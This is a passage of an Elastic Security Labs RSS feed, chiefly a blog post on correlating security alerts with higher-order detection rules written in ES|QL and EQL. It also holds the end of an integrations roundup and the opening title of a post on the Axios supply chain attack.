<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/proofpoint_essentials">Proofpoint Essentials</a> integration.</p>
<h2>AWS Security Hub</h2>
<p>AWS Security Hub aggregates findings across your AWS environment, but investigating those findings means staying inside the AWS console, separate from the rest of your team’s security data. The Elastic integration changes this by pulling Security Hub findings into Elastic in Open Cybersecurity Schema Framework (OCSF) format and normalizing them to ECS, offering schema-consistent data that’s immediately searchable via ES|QL.</p>
<p>Findings land in the <a href="https://www.elastic.co/docs/solutions/security/cloud/findings-page-3">Elastic Vulnerability Findings</a> page, integrating AWS cloud security posture directly into the workflows already in place. From there, you can correlate Security Hub data with signals from other sources, such as endpoint alerts, identity events, and network telemetry, to build a fuller picture of risk across your AWS environment and investigate faster than the native console allows.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/aws_securityhub">AWS Security Hub</a> integration.</p>
<h2>More new Elastic Security integrations</h2>
<p>In addition to the featured integrations above, the following integrations are now available, each shipping with prebuilt dashboards for immediate value:</p>
<ul>
<li><a href="https://www.elastic.co/docs/reference/integrations/jupiter_one">JupiterOne</a>: Asset intelligence and cloud attack surface monitoring, ingesting cross-tool alerts, CVE findings, and threat detections enriched with MITRE ATT&amp;CK mappings and CVSS scores, and host context for unified risk visibility.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/airlock_digital">Airlock Digital</a>: Application allowlisting and execution control telemetry, capturing blocked process executions with command lines, file hashes and publisher context, so unauthorized execution attempts are visible and correlatable alongside the rest of your endpoint detections.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/island_browser">Island Browser</a>: Enterprise browser security events spanning user navigation, device posture, compromised credential detection and admin activity, extending Elastic’s visibility to BYOD and unmanaged devices where traditional endpoint agents can’t be deployed.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/ironscales">Ironscales</a>: AI-powered phishing detection events capturing email metadata, sender reputation, affected mailbox counts and suspicious links, correlatable with endpoint and identity data for faster investigation and response.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/cyera">Cyera</a>: Data security posture management events, surfacing sensitive data risks including exposure severity, affected record counts, compliance framework violations, and datastore ownership across cloud environments, so sensitive data exposure doesn’t stay siloed in a separate DSPM console.</li>
</ul>
<h2>Get started</h2>
<p>These integrations reflect Elastic’s open approach to security. All nine integrations in this roundup ship with prebuilt dashboards and native ECS mappings, giving your team immediate visibility with no additional setup or custom visualization work required.</p>
<p>From there, findings, alerts and logs are immediately available to Elastic’s broader <a href="https://www.elastic.co/docs/solutions/security/ai/identify-investigate-document-threats">detection and investigation capabilities</a>: Attack Discovery for surfacing multi-stage threats, AI Assistant for natural-language investigation and guided response, and ES|QL and EQL for custom detection and hunting queries.</p>
<ul>
<li><a href="https://www.elastic.co/integrations/data-integrations?solution=security">Browse available integrations</a></li>
<li><a href="https://www.elastic.co/blog/automatic-migration-ai-rule-translation">Learn about migrating to Elastic Security from other SIEMs</a></li>
</ul>
<p>Have questions or feedback? Join #security-siem in the <a href="https://www.elastic.co/community/">Elastic Stack Community Slack</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/elastic-security-integrations-roundup-q1-2026.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Prioritizing Alerts Triage with Higher-Order Detection Rules]]></title>
            <link>https://www.elastic.co/security-labs/higher-order-detection-rules</link>
            <guid>higher-order-detection-rules</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Scaling SOC efficiency through multi-signal correlation and higher-order detection patterns.]]></description>
            <content:encoded><![CDATA[<p>At Elastic, we operate a large and diverse set of behavior detection rules across multiple datasets, environments, and severity levels. Most of these rules are atomic, each designed to detect a specific behavior, signal, or attack pattern. In addition, we ingest and promote <a href="https://github.com/elastic/detection-rules/tree/main/rules/promotions">external alerts</a> from security integrations such as firewalls, EDR, WAF, and other security controls.</p>
<p>The result is powerful visibility but also significant alert volume. From our telemetry, even when considering only non-<a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/about-building-block-rules">Building Block Rules</a>, <strong>65</strong> unique detection rules generate nearly <strong>8,000 alerts per day per production cluster</strong>. Analyzing each alert in isolation is neither scalable nor cost-effective.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image6.png" alt="" /></p>
<p>This is where <strong>Higher-Order Rules</strong> come into play.</p>
<p><a href="https://github.com/search?q=repo%3Aelastic%2Fdetection-rules++%22Rule+Type%3A+Higher-Order+Rule%22+path%3A%2F%5Erules%5C%2F%2F&amp;type=code">Higher-order</a> rules do not detect a single behavior. Instead, they correlate related alerts over time, across data sources, or within a shared context (such as host, user, IP, or process). By grouping signals into meaningful patterns, we can prioritize what truly matters and reduce the need for deep, expensive analysis on every individual alert, whether performed manually, automated, or augmented by AI.</p>
<p>In this blog, we’ll walk through our approach to building Higher-Order Rules in Elastic, share practical examples, and highlight key lessons learned along the way.</p>
<h2>What Are Higher-Order Rules?</h2>
<p>Higher-Order Rules (HOR) are detections that use <strong>alerts as input</strong>, either correlating alerts with other alerts (alert-on-alert) or combining alerts with additional data such as raw events, metrics, or contextual telemetry.</p>
<p>Unlike atomic rules that detect a single behavior, Higher-Order Rules identify patterns across signals. Their purpose is not to replace base detections, but to elevate combinations of findings that are more likely to represent real attack activity. In practice, they surface higher-confidence findings and improve triage prioritization. Higher-Order Rules are designed to work alongside <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/about-building-block-rules">Building Block Rules</a>. Building block rules generate alerts that do not appear in the default alerts view, reducing noise while still feeding correlated detections. Many of the base rules referenced in this article can also be configured as building block rules, so that only Higher-Order correlations surface for analyst review.</p>
<p>The core insight is that independent detections converging on the same entity compound confidence: each additional signal multiplies the likelihood that the activity is real, not benign. These three design principles operationalize that insight:</p>
<h3>1. Entity-Based Correlation</h3>
<p>Rules correlate activity by shared entities such as host, user, source IP, destination IP, or process, allowing analysts to quickly see when multiple findings converge on the same asset or identity.</p>
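<p>To make the pattern concrete, here is a minimal Python sketch of entity-based correlation over hypothetical ECS-style alert records. The field names, rule names, and threshold are illustrative only; in production this logic runs as ES|QL over alert indices, not in application code:</p>

```python
from collections import defaultdict

# Hypothetical alert records; keys mirror ECS field names (host.id, rule.name, event.code).
alerts = [
    {"host.id": "h1", "rule.name": "Suspicious PowerShell", "event.code": "behavior"},
    {"host.id": "h1", "rule.name": "Shellcode Injection", "event.code": "shellcode_thread"},
    {"host.id": "h1", "rule.name": "Malicious File", "event.code": "malicious_file"},
    {"host.id": "h2", "rule.name": "Suspicious PowerShell", "event.code": "behavior"},
]

def correlate_by_entity(alerts, entity_key="host.id", min_distinct_rules=2):
    """Group alerts by a shared entity and surface entities where
    multiple distinct detections converge."""
    by_entity = defaultdict(set)
    for alert in alerts:
        by_entity[alert[entity_key]].add(alert["rule.name"])
    return {entity: rules for entity, rules in by_entity.items()
            if len(rules) >= min_distinct_rules}

# Only "h1" has two or more distinct rules converging on it; "h2" is filtered out.
print(correlate_by_entity(alerts))
```

Swapping <code>entity_key</code> for <code>user.name</code> or <code>source.ip</code> gives the user- and IP-keyed variants of the same pattern.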
<h3>2. Cross–Data Source Visibility</h3>
<p>Some rules operate within a single integration (for example, endpoint-only detections from Elastic Defend or third-party EDR). Others intentionally combine signals across domains: endpoint with network (PANW, FortiGate, Suricata), endpoint with email, or endpoint with system metrics, to capture multi-stage or cross-surface activity.</p>
<h3>3. Time and Prevalence Awareness</h3>
<p>Temporal logic plays a key role.</p>
<p>Newly observed rules highlight the first occurrence of a given alert within a defined lookback window (for example, five days), ensuring that even a single rare alert is surfaced for review.</p>
<p>Prevalence-based logic (such as using <code>INLINE STATS</code>) filters for alerts that occur on only a small number of hosts globally, helping reduce noise and emphasize anomalous behavior.</p>
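<p>The first-seen and prevalence checks can likewise be sketched in Python. The records, rule names, and timestamps below are made up for illustration; the production rules implement this as ES|QL over the alert indices:</p>

```python
from datetime import datetime, timedelta

# Hypothetical alert records; keys mirror ECS field names (rule.name, host.id, @timestamp).
now = datetime(2026, 4, 2, 12, 0)
alerts = [
    {"rule.name": "Rare Persistence Technique", "host.id": "h1",
     "@timestamp": now - timedelta(minutes=4)},
    {"rule.name": "Common Noisy Rule", "host.id": "h1",
     "@timestamp": now - timedelta(days=3)},
    {"rule.name": "Common Noisy Rule", "host.id": "h2",
     "@timestamp": now - timedelta(minutes=2)},
]

def newly_observed(alerts, now, execution_window=timedelta(minutes=10), max_hosts=1):
    """Surface rules whose first-seen time falls inside the current execution
    window and that fire on only a few hosts (prevalence filter)."""
    first_seen, hosts = {}, {}
    for a in alerts:
        r = a["rule.name"]
        first_seen[r] = min(first_seen.get(r, a["@timestamp"]), a["@timestamp"])
        hosts.setdefault(r, set()).add(a["host.id"])
    return [r for r in first_seen
            if now - first_seen[r] <= execution_window and len(hosts[r]) <= max_hosts]

# Only the rule first seen inside the window, on a single host, survives.
print(newly_observed(alerts, now))
```

Note how the noisy rule is excluded twice over: its first-seen time is days old, and it fires on multiple hosts.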
<p>The full set of Higher-Order Rules spans endpoint-only correlations, cross-domain detections (endpoint + network, endpoint + email), lateral movement patterns (for example, <code>alert_1 host.ip = alert_2 source.ip</code>), ATT&amp;CK-aligned groupings (single or multi-tactic activity), newly observed alerts, and alert-to-event correlation (such as alerts combined with abnormal CPU metrics). The following sections walk through representative examples from these categories.</p>
<h2>Correlation and Newly Observed Higher-Order Rules</h2>
<p>In practice, high-risk activity does not always look the same.</p>
<p>Sometimes compromise reveals itself through <strong>multiple converging signals</strong>. Other times, it appears as a <strong>single alert that has never been seen before</strong>.</p>
<p>To handle both realities, we organize our Higher-Order Rules into three complementary patterns:</p>
<ul>
<li><strong>Correlation rules</strong>: multiple alerts or events linked to a shared entity (host, user, IP, or process).</li>
<li><strong>Newly observed rules</strong>: a single alert that is rare or first-seen within a defined time window.</li>
<li><strong>Hybrid patterns</strong>: combining correlation with first-seen logic, which can further elevate suspicion and surface particularly interesting activity.</li>
</ul>
<p>Correlation rules raise confidence through signal density and diversity: when several independent detections point to the same entity, the likelihood of real malicious activity increases.</p>
<p>Newly observed rules address the opposite case, low volume but high novelty. They prioritize alerts based on rarity over time, ensuring that first-time or highly unusual detections are not overlooked simply because they occur once.</p>
<p>Together, these approaches form the foundation of an efficient and scalable triage strategy.</p>
<p>Let’s dive into examples and explore the differences, strengths, and trade-offs of each pattern.</p>
<h3>Endpoint Alerts Correlation</h3>
<p>A significant portion of real-world attack discovery comes from endpoint telemetry. It provides rich context (process activity, command lines, file behavior, and user actions), making it one of the most powerful detection sources.</p>
<p>At the same time, endpoint environments are dynamic. Legitimate software, admin tools, and third-party applications (and recently GenAI endpoint utilities 🥲) can generate high alert volume and false positives, requiring continuous tuning.</p>
<p>Higher-Order correlation helps address this by shifting the focus from individual alerts to <strong>multiple distinct signals on the same host or process</strong>, increasing confidence while reducing unnecessary investigation effort.</p>
<p>The following ES|QL query triggers when, within a 24-hour window on the same host, there are 3 or more unique Elastic Defend behavior rules, alerts from 2 or more different features (e.g., a shellcode_thread alert alongside a behavior alert, or malicious_file with behavior), or 2 or more malware alerts with distinct file hashes:</p>
<pre><code>from logs-endpoint.alerts-* metadata _id
| eval day = DATE_TRUNC(24 hours, @timestamp)
| where event.code in (&quot;malicious_file&quot;, &quot;memory_signature&quot;,  &quot;shellcode_thread&quot;, &quot;behavior&quot;) and 
 agent.id is not null and not rule.name in (&quot;Multi.EICAR.Not-a-virus&quot;)
| stats Esql.alerts_count = COUNT(*),
        Esql.event_code_distinct_count = count_distinct(event.code),
        Esql.rule_name_distinct_count = COUNT_DISTINCT(rule.name),
        Esql.file_hash_distinct_count = COUNT_DISTINCT(file.hash.sha256),
        Esql.process_entity_id_distinct_count = COUNT_DISTINCT(process.entity_id) by host.id, day
| where (Esql.event_code_distinct_count &gt;= 2 or Esql.rule_name_distinct_count &gt;= 3 or Esql.file_hash_distinct_count &gt;= 2)
</code></pre>
<p>To further raise suspicion, we can also correlate Elastic Defend alerts that belong to the same process tree:</p>
<pre><code>from logs-endpoint.alerts-*
| where event.code in (&quot;malicious_file&quot;, &quot;memory_signature&quot;, &quot;shellcode_thread&quot;, &quot;behavior&quot;) and
        agent.id is not null and not rule.name in (&quot;Multi.EICAR.Not-a-virus&quot;) and process.Ext.ancestry is not null

// aggregate alerts by process.Ext.ancestry and agent.id
| stats Esql.alerts_count = COUNT(*),
        Esql.rule_name_distinct_count = COUNT_DISTINCT(rule.name),
        Esql.event_code_distinct_count = COUNT_DISTINCT(event.code),
        Esql.process_id_distinct_count = COUNT_DISTINCT(process.entity_id),
        Esql.message_values = VALUES(message),
   ... by process.Ext.ancestry, agent.id

// filter for at least 3 unique process IDs and 2 or more alert types or rule names.
| where Esql.process_id_distinct_count &gt;= 3 and (Esql.rule_name_distinct_count &gt;= 2 or Esql.event_code_distinct_count &gt;= 2)

// keep unique values
| stats Esql.alert_names = values(Esql.message_values),
        Esql.alerts_process_cmdline_values = VALUES(Esql.process_command_line_values),
... by agent.id
| keep Esql.*, agent.id
</code></pre>
<p>Example of matches:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image9.png" alt="" /></p>
<p>To complement our coverage, we also need to look for rare atomic alerts. The following ES|QL is designed to run on a 10-minute schedule with a 5- or 7-day lookback window. The lookback aggregates all alerts by rule name over the full window to compute first-seen time. The final filter (<code>Esql.recent &lt;= 10</code>) ensures only rules whose first-seen time falls within the current 10-minute execution window are surfaced, effectively detecting the moment a rule fires for the first time in the lookback period. This surfaces both rare false positives and stealthy behaviors that might otherwise be lost in volume:</p>
<pre><code>from logs-endpoint.alerts-*
| WHERE event.code == &quot;behavior&quot; and rule.name is not null
| STATS Esql.alerts_count = count(*),
        Esql.first_time_seen = MIN(@timestamp),
        Esql.last_time_seen = MAX(@timestamp),
        Esql.agents_distinct_count = COUNT_DISTINCT(agent.id),
        Esql.process_executable = VALUES(process.executable),
        Esql.process_parent_executable = VALUES(process.parent.executable),
        Esql.process_command_line = VALUES(process.command_line),
        Esql.process_hash_sha256 = VALUES(process.hash.sha256),
        Esql.host_id_values = VALUES(host.id),
        Esql.user_name = VALUES(user.name) by rule.name
// first time seen in the last 5 days - defined in the rule schedule Additional look-back time
| eval Esql.recent = DATE_DIFF(&quot;minute&quot;, Esql.first_time_seen, now())
// first time seen is within 10m of the rule execution time
| where Esql.recent &lt;= 10 and Esql.agents_distinct_count == 1 and Esql.alerts_count &lt;= 10 and (Esql.last_time_seen == Esql.first_time_seen)
// Move single values to their corresponding ECS fields for alerts exclusion
| eval host.id = mv_min(Esql.host_id_values)
| keep host.id, rule.name, Esql.*
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image7.png" alt="" /></p>
<p>The same <a href="https://github.com/elastic/detection-rules/blob/d358641c452dc0af5ab85d02f6f8948ec57c7ab9/rules/cross-platform/multiple_external_edr_alerts_by_host.toml#L16">logic</a> can be applied to an <a href="https://github.com/elastic/detection-rules/blob/main/rules/promotions/external_alerts.toml#L27">External Alert</a> from other third party EDRs:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image2.png" alt="" /></p>
<h3>Endpoint with Network Alerts Correlation</h3>
<p>A powerful detection approach is correlating endpoint alerts with network alerts. This helps answer the key question:</p>
<p><strong>Which process triggered this network alert?</strong></p>
<p>Network alerts alone often lack process context, such as which user or executable initiated the activity. By combining network alerts with endpoint telemetry (EDR data), you can enrich alerts with:</p>
<ul>
<li>Process name and hash</li>
<li>Command line and parent process</li>
<li>User and device information</li>
</ul>
<p>The following query correlates any Elastic Defend alert with suspicious events from network security devices such as Palo Alto Networks (PANW) and Fortinet FortiGate. The join key is the IP address: for network alerts this is <code>source.ip</code>; for endpoint alerts, it is <code>host.ip</code>. The query normalizes these into a single field using <code>COALESCE</code>, enabling correlation across data sources that use different field names for the same entity. A match may indicate that the host is compromised and triggering alerts across multiple data sources.</p>
<pre><code>FROM logs-* metadata _id
| WHERE 
 (event.module == &quot;endpoint&quot; and event.dataset == &quot;endpoint.alerts&quot;) or
 (event.dataset == &quot;panw.panos&quot; and event.action in (&quot;virus_detected&quot;, &quot;wildfire_virus_detected&quot;, &quot;c2_communication&quot;, ...)) or
 (event.dataset == &quot;fortinet_fortigate.log&quot; and (...)) or
 (event.dataset == &quot;suricata.eve&quot; and message in (&quot;Command and Control Traffic&quot;, &quot;Potentially Bad Traffic&quot;, ...))
| eval 
      fw_alert_source_ip = CASE(event.dataset in (&quot;panw.panos&quot;, &quot;fortinet_fortigate.log&quot;), source.ip, null),
      elastic_defend_alert_host_ip = CASE(event.module == &quot;endpoint&quot; and event.dataset == &quot;endpoint.alerts&quot;, host.ip, null)
| eval Esql.source_ip = COALESCE(fw_alert_source_ip, elastic_defend_alert_host_ip)
| where Esql.source_ip is not null
| stats Esql.alerts_count = COUNT(*),
        Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),
        Esql.message_values_distinct_count = COUNT_DISTINCT(message),
        ... by Esql.source_ip
| where Esql.event_module_distinct_count &gt;= 2 AND Esql.message_values_distinct_count &gt;= 2
| eval concat_module_values = MV_CONCAT(Esql.event_module_values, &quot;,&quot;)
| where concat_module_values like &quot;*endpoint*&quot;
</code></pre>
<p>Example of matches correlating Elastic Defend and FortiGate alerts, where the <code>source.ip</code> of the FortiGate alert equals the <code>host.ip</code> of the Elastic Defend endpoint alert:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image3.png" alt="" /></p>
<p>The following EQL query correlates Suricata alerts with Elastic Defend network events to provide context about the source process and host:</p>
<pre><code>sequence by source.port, source.ip, destination.ip with maxspan=5s
// Suricata severity 3 corresponds to informational alerts, which are excluded to reduce noise
[network where event.dataset == &quot;suricata.eve&quot; and event.kind == &quot;alert&quot; and  event.severity != 3 and source.ip != null and destination.ip != null]
[network where event.module == &quot;endpoint&quot; and event.action in  (&quot;disconnect_received&quot;, &quot;connection_attempted&quot;)]
</code></pre>
<p>Example of matches confirming the Suricata alert and linking it to the targeted web server process (nginx) via Elastic Defend events, corroborating the web-exploitation attempt:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image8.png" alt="" /></p>
<h3>Endpoint Security with Observability</h3>
<p>Correlating observability telemetry with security alerts is a powerful detection strategy.</p>
<p>The <a href="https://en.wikipedia.org/wiki/XZ_Utils_backdoor">XZ</a> Utils backdoor incident demonstrated that security-relevant anomalies may first surface as performance regressions rather than traditional security alerts. In that case, unusual behavior in the SSH daemon led to deeper investigation and eventual discovery of malicious code.</p>
<p>This highlights an important principle: <strong>operational anomalies can be early indicators of compromise.</strong></p>
<p>With the <a href="https://www.elastic.co/docs/reference/integrations/system#metrics-reference">Elastic Agent</a>, system metrics such as CPU and memory utilization can be collected alongside security telemetry. By correlating abnormal resource spikes with SIEM alerts, either by process or by host, we can increase detection confidence and surface high-risk activity earlier.</p>
<p>For example, an ES|QL correlation rule can identify a process exhibiting sustained 70% CPU utilization that is also the source of a memory signature alert for a cryptominer from Elastic Defend. Individually, each signal may be low or medium severity. Correlated together, they represent high-confidence malicious activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image1.png" alt="" /></p>
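<p>Sketched in Python over made-up metric and alert documents (the CPU field name follows the system integration’s metrics schema, but the join key, records, and 70% threshold here are illustrative; the actual rule is ES|QL):</p>

```python
# Hypothetical documents joined on (host.id, process.entity_id).
metrics = [
    {"host.id": "h1", "process.entity_id": "p42", "system.process.cpu.total.pct": 0.85},
    {"host.id": "h1", "process.entity_id": "p7",  "system.process.cpu.total.pct": 0.05},
]
alerts = [
    {"host.id": "h1", "process.entity_id": "p42",
     "rule.name": "Cryptominer Memory Signature", "event.code": "memory_signature"},
]

def correlate_cpu_with_alerts(metrics, alerts, cpu_threshold=0.70):
    """Return alerts whose source process also shows sustained high CPU,
    compounding two medium-severity signals into one high-confidence finding."""
    hot = {(m["host.id"], m["process.entity_id"]) for m in metrics
           if m["system.process.cpu.total.pct"] >= cpu_threshold}
    return [a for a in alerts if (a["host.id"], a["process.entity_id"]) in hot]

# The memory-signature alert fires on the same process that is pegging the CPU.
print(correlate_cpu_with_alerts(metrics, alerts))
```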
<p>We developed <strong>over 30 Higher-Order detections</strong> covering various types of relationships. While we can’t cover all of them here, the links below provide <strong>enough context to adapt these rules to your environment</strong>:</p>
<p>Endpoint Alerts:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_edr_elastic_defend_by_host.toml#L16">Multiple Elastic Defend Alerts by Agent</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_edr_elastic_same_process_tree.toml#L16">Multiple Elastic Defend Alerts from a Single Process Tree</a><br />
<a href="https://github.com/elastic/detection-rules/blob/6a7c1e96749fd5c2fc8801da747f4e29d18150a1/rules/cross-platform/multiple_elastic_defend_behavior_rules_same_host_prevalence.toml#L19">Multiple Rare Elastic Defend Behavior Rules by Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_elastic_defend_alert.toml#L17">Newly Observed Elastic Defend Behavior Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_external_edr_alerts_by_host.toml#L16">Multiple External EDR Alerts by Host</a></p>
<p>Endpoint and Network:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_panos_alert.toml#L17">Newly Observed Palo Alto Network Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_suricata_alert.toml#L17">Newly Observed High Severity Suricata Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_socks_fortigate_endpoint.toml#L19">FortiGate SOCKS Traffic from an Unusual Process</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml#L17">PANW and Elastic Defend - Command and Control Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_elastic_defend_netsecurity_by_host.toml#L18">Elastic Defend and Network Security Alerts Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml#L17">Suricata and Elastic Defend Network Correlation</a></p>
<p>Generic by MITRE ATT&amp;CK:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_risky_host_esql.toml#L17">Alerts in Different ATT&amp;CK Tactics by Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_same_tactic_by_host.toml#L18">Multiple Alerts in Same ATT&amp;CK Tactic by Host</a></p>
<p>Generic multi-integrations correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_srcip.toml#L17">Alerts From Multiple Integrations by Source Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_dstip.toml#L17">Alerts From Multiple Integrations by Destination Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_user.toml#L17">Alerts From Multiple Integrations by User Name</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_elastic_detection_rule.toml#L17">Newly Observed High Severity Detection Alert</a></p>
<p>Lateral movement correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml">Suspected Lateral Movement from Compromised Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/lateral_movement_multi_alerts_new_srcip.toml#L15">Lateral Movement Alerts from a Newly Observed Source Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/lateral_movement_multi_alerts_new_userid.toml#L16">Lateral Movement Alerts from a Newly Observed User</a></p>
<p>Observability and security correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml#L17">Detection Alert on a Process Exhibiting CPU Spike</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml#L17">Multiple Alerts on a Host Exhibiting CPU Spike</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_newly_observed_process_with_high_cpu.toml#L18">Newly Observed Process Exhibiting High CPU Usage</a></p>
<p>Machine Learning correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/d358641c452dc0af5ab85d02f6f8948ec57c7ab9/rules/cross-platform/multiple_machine_learning_jobs_by_entity.toml#L16">Multiple Machine Learning Alerts by Influencer Field</a></p>
<p>Other correlation ideas:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_vulnerabilities_wiz_by_container.toml#L18">Multiple Vulnerabilities by Asset via Wiz</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml#L17">Elastic Defend and Email Alerts Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml#L23">Suspicious Kerberos Authentication Ticket Request</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/credential_access_multi_could_secrets_via_api.toml#L19">Multiple Cloud Secrets Accessed by Source Address</a></p>
<p>These examples illustrate how correlating alerts across endpoints, network, and observability can <strong>enrich context, accelerate investigations, and improve detection confidence</strong>. We are actively expanding coverage in this area to support additional correlation scenarios.</p>
<p>You can enable them by filtering for the tag value <code>Rule Type: Higher-Order Rule</code> in the rules management page:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image4.png" alt="" /></p>
<p>Over a 15-day period, alert counts remained within acceptable volume (~30 alerts/day). Targeted tuning of initial outliers is expected to reduce them to ~20 alerts/day and materially improve overall signal quality.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image5.png" alt="" /></p>
<h3>Considerations and Trade-offs</h3>
<p>Higher-Order Rules introduce potential scheduling latency. Since they query alert indices, there is an inherent delay between when base alerts fire and when correlations surface. Rule scheduling intervals and look-back windows should be tuned to balance timeliness against performance cost. Additionally, HOR quality depends directly on the quality of the base detections. A noisy atomic rule will cascade false positives into every correlation that references it. We recommend tuning base rules aggressively before enabling dependent Higher-Order Rules. Finally, ES|QL queries over broad index patterns (e.g., <code>logs-*</code>) can be expensive at scale. In high-volume environments, scoping index patterns to specific datasets or using data views can significantly reduce query cost.</p>
<h2>Conclusion</h2>
<p>Higher-Order Rules are essential for prioritizing alert triage and managing alert volumes for automation and AI-driven analysis. When combined with <a href="https://www.elastic.co/docs/solutions/security/advanced-entity-analytics/entity-risk-scoring">Entity Risk Scoring</a>, Higher-Order Rules can feed directly into host and user risk profiles, creating a quantitative prioritization layer that further reduces manual triage burden. In our production tests, the majority of these detections produced a medium to low alert volume, making them practical for real-world use. While a small number of noisy rules or false positives may initially surface, excluding these at the atomic rule level quickly leaves a robust set of high-value correlations.</p>
<p>To maximize their effectiveness, two operational practices are critical. First, ensure that input alerts use severity levels that accurately reflect both noise and real-world impact: cleaning and normalizing severity is foundational to meaningful correlation. Second, start small and expand deliberately: avoid trying to correlate every possible alert signal. Exclude inherently noisy tactics (such as discovery), deprioritize low-severity signals, and deprecate rules that disproportionately influence correlation outcomes.</p>
<p>Applied correctly, Higher-Order Rules streamline investigations, improve detection accuracy, and significantly increase the efficiency and trustworthiness of modern security operations.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/higher-order-detection-rules.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[How we caught the Axios supply chain attack]]></title>
            <link>https://www.elastic.co/security-labs/how-we-caught-the-axios-supply-chain-attack</link>
            <guid>how-we-caught-the-axios-supply-chain-attack</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Joe Desimone shares the story of how he caught the Axios supply chain attack with a proof of concept tool built in an afternoon.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
